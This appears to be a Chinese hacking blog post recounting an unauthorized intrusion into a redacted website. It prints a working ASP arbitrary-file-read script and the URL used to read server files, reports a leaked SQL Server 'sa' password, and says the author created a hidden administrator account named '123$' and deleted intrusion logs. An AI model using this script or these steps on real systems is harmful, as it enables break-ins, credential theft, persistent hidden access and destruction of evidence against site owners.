攻击目标:www.***.com 测试过的动作,一句话马,加密马,等。 测试结果:无效,无法上传,无法进入系统。 经过2天的分析, 然后自己搞出了一个代码,利用此代码读取了该网站下的config.asp文件源代码
-------------------------------------------------------------------------
<% file=Request("file") Set FSOOBJ=Server.CreateObject("Scripting.FileSystemObject") if FSOOBJ.fileExists(file) then Set myfile=FSOOBJ.opentextfile(file,1) Response.write "<pre>" & server.HTMLEncode(myfile.readall) &"</pre>" myfile.close Set myfile=nothing else Response.write "file(" & file & ") not exists." end if %> ------------------------------------------------------------------------- http://www.***.com/view.asp?file=D:\wwwroot\index.asp
读取到的敏感内容 sql地址:***.***.***.*** 帐号:sa 密码:u8f2444f
利用此帐号进入后,建立了123$的隐藏管理员用户,删除入侵日志后退出。
·上一篇: Win2K系统几个攻击实例成败心得(二)
·下一篇: 管理员的玩笑管理员权限上传漏洞解析
|